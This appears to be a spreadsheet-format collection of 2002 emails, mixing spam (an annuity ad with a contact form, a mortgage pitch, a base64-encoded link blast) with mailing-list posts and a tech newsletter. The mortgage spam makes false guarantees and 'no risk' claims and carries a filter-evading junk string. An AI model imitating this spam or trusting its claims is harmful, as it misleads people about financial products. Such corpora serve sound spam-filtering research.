 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net
 &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;=20
 ------=_NextPart_000_0007_01C1FAAC.4A47E870
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Upside Only Treasury-Linked Annuity&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td bgcolor=3D"#000000"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/4s/april02/20020424-1b.jpg" =
 width=3D"550" height=3D"398" alt=3D"A one of a kind annuity...that isn't =
 a gamble!&amp;#10;Upside Only - Treasury-Linked - 4% Commission"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/4s/april02/spacer.gif" width=3D"2" =
 height=3D"2"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/4s/april02/20020408-2a.gif" =
 width=3D"550" height=3D"60" alt=3D"Liquid after 5 years!&amp;#10;4.75% =
 Minimum Guaranteed floor for 5 years*"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;
             &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3" color=3D"#000066"&gt;=20
             &lt;img =
 src=3D"http://63.211.81.87/images/4s/april02/spacer.gif" width=3D"8" =
 height=3D"45" align=3D"left"&gt;&amp;#149;
             &lt;font color=3D"#0000FF"&gt;Upside of annual increases&lt;/font&gt; in =
 5-Year T-Note&lt;br&gt;
             &amp;#149;&amp;nbsp;&lt;font color=3D"#0000FF"&gt;Bonus Crediting&lt;/font&gt; =
 Over Normal=20
             Treasury Notes&lt;br&gt;
             &amp;#149;&amp;nbsp;&lt;font color=3D"#0000FF"&gt;&amp;quot;Alternative&lt;/font&gt; =
 for Large=20
             Municipal Bond or T-Note Buyers&amp;quot;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000000"&gt;=20
             Call or &lt;a href=3D"mailto:annuities@fsfginc.com"&gt;e-mail&lt;/a&gt; =
 us today!&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/4s/april02/20020408-3.gif" =
 width=3D"542" height=3D"82" alt=3D'800-235-7949'&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#0099CC"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;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value=3D"annuities@fsfginc.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"FSFG's IQ Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;a href=3D"http://www.fsfginc.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/4s/april02/20020408-4.gif" =
 width=3D"330" height=3D"90" border=3D"0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; *For =
 deposits over $100,000&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; We =
 don't want anybody=20
         to receive our mailings who does not wish to receive them. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here: &lt;a href=3D"http://www.Insurancemail.net"&gt;=20
         http://www.Insurancemail.net&lt;/a&gt;&lt;br&gt;
         &lt;a href=3D'http://www.insuranceiq.com/legal.htm'&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C1FAAC.4A47E870--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TheThresher
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Is this old bits? It should be.
 I was browsing the local zine store here in Portland OR and found the
 second issue of The Thresher...very very sweet. Poltical socio articles on
 all manner of things from names you have come to love/despise over the
 years. If you have not already, tombobjoewhore says check it out.
 www.thethresher.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Don't get caught by rising interest rates.
</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity is knocking. Why?
 Because mortgage rates are rising.
 As a National Lender, not a broker, we can
 guarantee you the lowest possible rate on your
 home loan.
 Rates may well never be this low again. This is
 your chance to secure a better future. You could
 literally save enough money to buy that new car
 you've been wanting or to take that special
 vacation. Why pay more than you have to pay?
 We can guarantee you the best rate and the best
 deal possible for you. But only if you act now.
 This is a free service. No fees of any kind.
 You can easily determine if we can help you in
 just a few short minutes. We only provide
 information in terms so simple that anyone can
 understand them. We promise that you won't need
 an attorney to see the savings.
 We offer both first and second home loans and we
 will be happy to show you why your current loan
 is the best for you. 0r why you should replace
 it.
 Once again, there's no risk for you. None at all.
 Take two minutes and use the link(s) below that
 works for you. Let us show you how to get more
 for yourself and your family. Don't let
 opportunity pass you by. Take action now.
 &lt;a href="http://209.202.221.16/director.asp?id=1&amp;target=http://211.167.74.101/mortg/"&gt;Click_Here&lt;/a&gt;
 http://209.202.221.16/director.asp?id=1&amp;target=http://211.167.74.101/mortg/
 Sincerely,
 Chalres M. Gillette
 MortCorp, LLC
 olhfilghxvuyfkfqbviqgacyenuuufpyswymlajxucqhpojagplujpmovuiaphwlqkkstgipemliwuugqptjukjklbjlgxqmuogtiwhhdlhjhkbucvbyqvgfp
 __________________________________________________________________
 The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] 3c509 &amp; 2.4.19 problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting cout@eircom.net (cout@eircom.net):
 &gt; You need to run the dos setup program for the 3c509 and turn off plug
 &gt; 'n' play in the card's firmware I think you will find.
 As Kevin said, the problem can reputedly be solved using Donald Becker's 
 Linux-native utilities for the 3C5X9 series.  Turn off PnP, and then set 
 the IRQ and I/O base address as required.  Make sure those are also
 made available in the motherboard BIOS Setup program to "Legacy ISA
 devices" or whatever it's called, there.
 -- 
 Cheers,              "It ain't so much the things we don't know that get us
 Rick Moen            in trouble.  It's the things we know that ain't so."
 rick@linuxmafia.com             -- Artemus Ward (1834-67), U.S. journalist
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Not just like a virgin...a virgin...birth
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Rare Virgin Shark Births Reported in Detroit
 Voice of America - 5 hours ago
 A female shark has become a single mother - in the strictest sense of the
 term. Officials at Detroit's Belle Isle Aquarium say a shark there
 recently produced three babies in an event they are calling virgin births.
 http://www.cnn.com/2002/US/Midwest/09/23/offbeat.shark.births.ap/
 http://www.miami.com/mld/miamiherald/4124307.htm
 http://www.startribune.com/stories/1451/3320433.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: dvd::rip on Red Hat 8.0?
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Michl wrote :
 &gt; Has anyone made a working source RPM for dvd::rip for Red Hat 8.0?
 I don't think I've tried yet, but if I did, I probably moved on to another
 package after having bumped into one of the problems you mention.
 If anyone sends me a patch to my spec file and eventually needed patches
 etc., I'd be more than glad to make a new build available.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.13 0.09 0.09
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Medieval Mocha
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020717.html"&gt;
       http://www.lockergnome.com/issues/daily/20020717.html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&lt;/style&gt;&lt;title&gt;20020717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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.17.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;FREE COLOR PRINTERS FROM XEROX - $4,500 VALUE&lt;/b&gt; Enroll in the Xerox FreeColorPrinters program and get a Phaser network color printer for FREE.  Small businesses, schools and non-profits have been participating in this risk free program since 1999. &lt;a href="http://psstt.com/1/c/22869/64298/191532/191532"&gt;Learn more&lt;/a&gt;.  
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Falling asleep at the wheel is no laughing matter. Still, it kinda
 happened with &lt;a href="http://www.lockergnome.com/issues/daily/20020716.html"&gt;yesterday's
 tip&lt;/a&gt;. I forgot to mention that the String value's label
 is "Logging" (sans quotes). That was almost like a cliffhanger,
 eh? The oversight was totally my fault. I've been thinking about
 asking Gretchen and Brian to help with future reviews. Don't be
 surprised if that happens soon. I'm sure you'd welcome a female
 perspective on this stuff, right? She helped one of our landlords
 pick a paint color for the "office" wall this evening. Does that
 qualify her to talk about cool stuff that we find for you on the
 Internet? You betcha. Let's see how she does with the drapes and
 rugs. I have a feeling I'll be the one tweaking furniture layout.
 Shouldn't be too much of an issue - yet. I wonder if Ikea has an
 affiliate program?
 &lt;p&gt;
 I've mentioned how Yahoo Mail's beta is mangling our commas, but
 did you know that it's also (possibly) rewriting your e-mail? If
 you send an HTML message to someone who has a yahoo.com account,
 something may get lost in the translation. Try sending this
 sentence: "My medieval mocha has an expression to evaluate."
 Again, be sure this note is sent in HTML format. The results will
 surprise you. As far as I can tell, they're doing this to stop any
 scripts from being distributed to their user base. I must credit
 Marion Schroll for making me aware of the "problem." It's kinda
 funny, in a weird sort of way. Not that I would want anything I
 send changed in any way, shape, or form. It begs the question:
 what next? I mean, where does it all stop? Give them a bit, and
 they just might take a byte. Censorship is only a stone's throw
 away.
 &lt;p&gt;
 I really feel for Lockergnomie Sharon Clark, who asks: "What is
 this crazy business with the broadband metering? What they
 advertise doesn't seem to be what you get. Now that I'm forking
 out $60 per month for a supposed metered rate of 640 down / 320
 up, I'm feeling clueless and left out in the cold. Not sure what
 I'm paying for, not sure what's going on at the office, not sure
 if I'm capped, not sure if I'm getting ripped off! Can you help me
 out here? I'm feeling lied to; why can't I download 'til my 40 gig
 is full? That is what they promised me and that is what I THOUGHT
 I was paying for. I want consistent speed - is this too much to
 ask?" It's not too much to ask the question, but it's probably too
 much to get the answer. I'm facing the same dilemma right now,
 even though cable-based connectivity isn't available in my area.
 Expect more and more "filters" to be put in place as time marches
 on. Watch those EULAs, folks.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&lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Latest Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A title="freeware: anti-virus tool" HREF="http://www.mywebattack.com/gnomeapp.php?id=100279"&gt;AntiVir PE 6.14.00.63&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: mass-rename MP3 files" HREF="http://www.mywebattack.com/gnomeapp.php?id=104508"&gt;MP3 Rename 7.1.4.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: Outlook Express add-on" HREF="http://www.mywebattack.com/gnomeapp.php?id=104554"&gt;OE-QuoteFix 1.15.5&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: anti-virus scanner" HREF="http://www.mywebattack.com/gnomeapp.php?id=104681"&gt;AntiVir PE f 6.14.00.63&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: P2P file search without sharing" HREF="http://www.mywebattack.com/gnomeapp.php?id=104590"&gt;MyKazaa 1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: delete old temporary files" HREF="http://www.mywebattack.com/gnomeapp.php?id=104511"&gt;EraseTemp 3.1.0.2&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: MP3 player" HREF="http://www.mywebattack.com/gnomeapp.php?id=104298"&gt;ZAP Audio Player 1.20&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: powerful email program with many features" HREF="http://www.mywebattack.com/gnomeapp.php?id=102683"&gt;PocoMail 2.61.1056&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: stress test for web servers" HREF="http://www.mywebattack.com/gnomeapp.php?id=103786"&gt;Webserver Stress  5.3.4&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: digital photo manager and processor" HREF="http://www.mywebattack.com/gnomeapp.php?id=104925"&gt;PhotoMeister 1.04&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: eliminate browser pop-ups" HREF="http://www.mywebattack.com/gnomeapp.php?id=104548"&gt;PopupWar 3.0.75&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: manage your hard disk" HREF="http://www.mywebattack.com/gnomeapp.php?id=104398"&gt;Disk Triage 6.3.1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: software deployment manager" HREF="http://www.mywebattack.com/gnomeapp.php?id=104235"&gt;Broccoli ADS 2.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: e-mail routing utility" HREF="http://www.mywebattack.com/gnomeapp.php?id=102083"&gt;Mail REDirect 1.3.240&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: image viewer" HREF="http://www.mywebattack.com/gnomeapp.php?id=102191"&gt;Mindex Image Vie 2.7.16&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Directory Lister v0.5.2 [547k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://freeware.prv.pl/"&gt;http://freeware.prv.pl/&lt;/a&gt;
 &lt;p&gt;
 {List directory contents} When I was younger, I'd get so frustrated at those games where you'd have to pick out all of the subtle differences between two pictures. I'd always end up with one or two that I just could never see. When I want to do the same type of comparison between two directories on my computer, I use Directory Lister and I never miss a thing. Not only does Directory Lister display the contents of your chosen directories, it will also let you save the output to an HTML file. This is great for web developers who want a quick way to list the contents of a ZIP file before archiving it and uploading it to their website. As an added bonus, Directory Lister also shows the date, time, and attributes of the files in your directory, making it easier than ever to compare the differences in files between two directories.
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Web Calendar [25k] W2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://members.lycos.co.uk/bleucanard/WebCalendar.htm"&gt;http://members.lycos.co.uk/bleucanard/WebCalendar.htm&lt;/a&gt;
 &lt;p&gt;
 {Web page reminder} Surfing the web as much as I do, I'll occasionally run into a site or page that commits the horrendous faux pas of displaying an "Under Construction" banner. I COULD forget about the site and maybe somehow encounter it later, or I COULD drop the site into Web Calendar and have this handy-dandy app remind me to check the page again in a week. The same technique holds true for my normal browsing... for example, I can use Web Calendar to remind me to check out the Digital Media newsletter every morning, or to check Amazon for a CD that I know will be released in a week. Now, I will have no excuse for missing the DVD release of "Lord of the Rings"...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&lt;b&gt;SQLView v2.1.0.20 [5.2M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href=""&gt;http://mywebpages.comcast.net/fredbubbers/software/&lt;/a&gt;
 &lt;p&gt;
 {View ODBC Output} SQLView is "A SQL Database viewing utility. (It) automatically detects all available ODBC data sources and displays them in an explorer-like tree. User(s) may double-click on data sources to access the databases, browse tables, execute custom queries and export (the) data to .CSV or .XML files." I didn't really have much on my machine to throw at this program. However, the one data source I did have (mostly related to Music CD creation) displayed perfectly in SQL View. (And I have the .csv file to prove it!  Nyah!)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&lt;b&gt;CollegeBAR v8.0 [5.9M] W9x/2k/XP US$20&lt;/b&gt;&lt;br&gt;
     Unearthed by Shawn Verrall
 &lt;p&gt;
 &lt;a class="URL" href="http://www.pracx.com/collegebar.asp"&gt;http://www.pracx.com/collegebar.asp&lt;/a&gt;
 &lt;p&gt; 
 {Mix your own drinks} When I was in college, my room used to be known as "The Bar." It may have had something do with my L-shaped desk that resembled a bar, and the fact that I had seen the movie Cocktail too many times and wanted to be a bottle-flipping bartender. I never achieved my goal of being the world's best geek bartender, but maybe with College Bar I could have. College Bar contains recipes for over 11,600 drinks. With an online update feature, you can download new drinks as they become available... or you can add your own creative concoctions to the database! College Bar also has a calculator to determine someone's blood alcohol level... drink responsibly, folks. As an added bonus, you can load some of your favorite party pictures into the program and you'll see a slide show of those pictures - a great way to remember the good times... unless you don't remember experiencing them in the first place, that is. Dude, where's my car?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border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Buy One Inkjet Cartridge - GET TWO FREE!!&lt;/b&gt; Buy 1 Get 2 FREE on Most Epson, Canon, and Apple Cartridges. Wholesale Pricing on Lexmark Cartridges. Free Shipping on orders $25 or more!! U.S. Shipping Only. &lt;a href="http://psstt.com/1/c/22869/56049/191532/191532"&gt;Click Here For a Complete List of Cartridges&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Beliefnet&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href=""&gt;http://www.beliefnet.com/&lt;/a&gt;
 &lt;p&gt;
 {Daily enlightenment} Whether you're Buddhist, Hindu, Muslim, Christian, Jewish, or anything else, Beliefnet.com has something for you. You can sign up for any of the ten Beliefnet newsletters - there's even one devoted to religious jokes. However, if you aren't looking for enlightenment for your Inbox, then just feel free to browse around. You're sure to find something interesting in the Inspiration section; the Parenting section has helpful features and articles. Or, test your savvy with "Stump Our Bible Expert." If you're seeking something new in the way of your spirituality, or are looking for some affirmations of your existing beliefs, it's likely you'll find it at Beliefnet.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I am a sucker for keyboard shortcuts. Anything that can save me from using the mouse is good in my book. Occasionally I like to view the web or Windows Explorer in Full Screen mode... to do this I just hit F11 on the keyboard and there I am in Full Screen mode. Hit it again and I am back to regular mode. If you aren't as much of a fan of keyboard shortcuts as me, then all you have to do is press and hold the Ctrl key while clicking on the Maximize button and you will have the same effect. You will notice, however, that your Start Menu isn't anywhere to be seen. Never fear, another keyboard shortcut is here... just press Ctrl key plus the Esc key and your Start Menu will be back where it belongs. Alternatively, if you have a Windows key on your keyboard you can use that key to bring up your Start Menu as well.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href="http://www.lockergnome.com/issues/daily/20020717.html"&gt;http://www.lockergnome.com/issues/daily/20020717.html&lt;/a&gt;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Medieval Mocha  --&gt;
 The "ZIP" in Zip Code stands for "Zoning Improvement Plan."
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Palm-sized translators going to Iraq
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541017
 Date: Not supplied
 The US Military is planning on equipping Gulf troops with two-way translators: 
 Palm-sized devices with speech-recognition and automated translation. Tried 
 speech-to-text lately? How about Babelfish? Boy, is this technology ever gonna 
 suck: "Take he to that chemistry arm vegetable." Link[1] Discuss[2] (_Thanks, 
 Nat[3]!_)
 [1] http://www.cnn.com/2002/US/Northeast/10/06/handheld.translator.ap/
 [2] http://www.quicktopic.com/boing/H/eXMNyidbgPL
 [3] http://www.frii.com/~gnat/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Government plans to hand out free Valium
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85521686
 Date: Not supplied
 The President's niece will no longer have to forge prescriptions for Valium. 
 All she'll have to do is participate in an unruly public demonstration to get a 
 free dose. Unfortunately for her, the government has no plans to shoot rocks of 
 cocaine at demonstrators, so she'll still have to depend on her drug dealer for 
 that. 
     The U.S. military is exploring ways to use drugs such as Valium to calm 
     people without killing them during riots or other crowd control situations 
     where lethal weapons are inappropriate. 
 Link[1] Discuss[2]
 [1] http://abcnews.go.com/wire/Politics/ap20020925_1716.html
 [2] http://www.quicktopic.com/16/H/rwiEsrBZkX8p
</t>
  </si>
  <si>
    <t xml:space="preserve">At 7:13 AM -0400 on 9/18/02, Rodent of Unusual Size wrote:
 &gt; SmartGroups, I think.
 Dave Farber's Interesting People list just went over to
 &lt;http://www.listbox.com&gt;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</si>
  <si>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wintermute wrote:
 &gt;&gt;Anyone know where in Ireland I can get a replacement external dongle
 &gt;&gt;for a Xircom CE3B-100 PCMCIA NIC?
 &gt;&gt;
 &gt;&gt;Failing that, who delivers fastest to Ireland?
 &gt;&gt;
 &gt;&gt;Regards,
 &gt;&gt;
 &gt;&gt;Vin
 &gt; 
 &gt; I went into Maplin looking for exactly this sort of thing, only to be told I
 &gt; would have to by a whole new card.....
 &gt; Buy &amp; Sell I'd say else just by a new NIC...(which I didn't do) I just live
 &gt; with the fact I have to angle the CAT 5 at a certain angle to my NIC or the
 &gt; dongle will fall out!
 Well, I went hunting online and it is definitely possible to get
 replacement dongles, specifically for this card but also for
 others.
 Tricky though ;-)
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Agreed, completely.  I totally grokked the notion of unintened consequence
 with the original.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Evdemon
 Sent: Monday, September 09, 2002 7:03 AM
 To: Fork@xent.com
 Subject: Re: Recommended Viewing
 On 8 Sep 2002 at 22:15, Geege Schuman wrote:
 &gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
 &gt; the original?
 &gt;
 By "original" if you are referring to the old PBS version, I liked that
 version much better.  Much more thought provoking.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: please see thanks aFTkNqJnKdMfZNDBHkLgjixDM2Z
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_EvPezLBcciXYy
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_EvPezLBcciXYyAA"
 ------=_NextPart_EvPezLBcciXYyAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGEgaHJlZj1odHRwOi8vaGxjLm5vLWlwLm9yZz4NCjxpbWcgc3JjPWh0dHA6Ly9ncm91cHMueWFo
 b28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9zbWFsbF9hMi5naWYgYWx0PWh0dHA6Ly9n
 cm91cHMueWFob28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9zbWFsbF9hMi5naWY+DQo8
 L2E+DQoNCjxhIGhyZWY9aHR0cHM6Ly9oYXBweS5yZWRpcmVjdG1lLm5ldC8+DQo8aW1nIHNyYz1o
 dHRwOi8vZ3JvdXBzLnlhaG9vLmNvbS9ncm91cC94aW54aW5yZW4vZmlsZXMvd2hfc21hbGxfYi5n
 aWYgYWx0PWh0dHA6Ly9ncm91cHMueWFob28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9z
 bWFsbF9iLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwOi8vZm9yZXZlcnNwLmhvcHRvLm9yZy96
 aXJlYWw+DQo8aW1nIHNyYz1odHRwOi8vZ3JvdXBzLnlhaG9vLmNvbS9ncm91cC96aGVuc2hpMDEv
 ZmlsZXMvd29ybGRrbm93LmpwZyBhbHQ9aHR0cDovL2dyb3Vwcy55YWhvby5jb20vZ3JvdXAvemhl
 bnNoaTAxL2ZpbGVzL3dvcmxka25vdy5qcGc+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cDovL3d3dy54
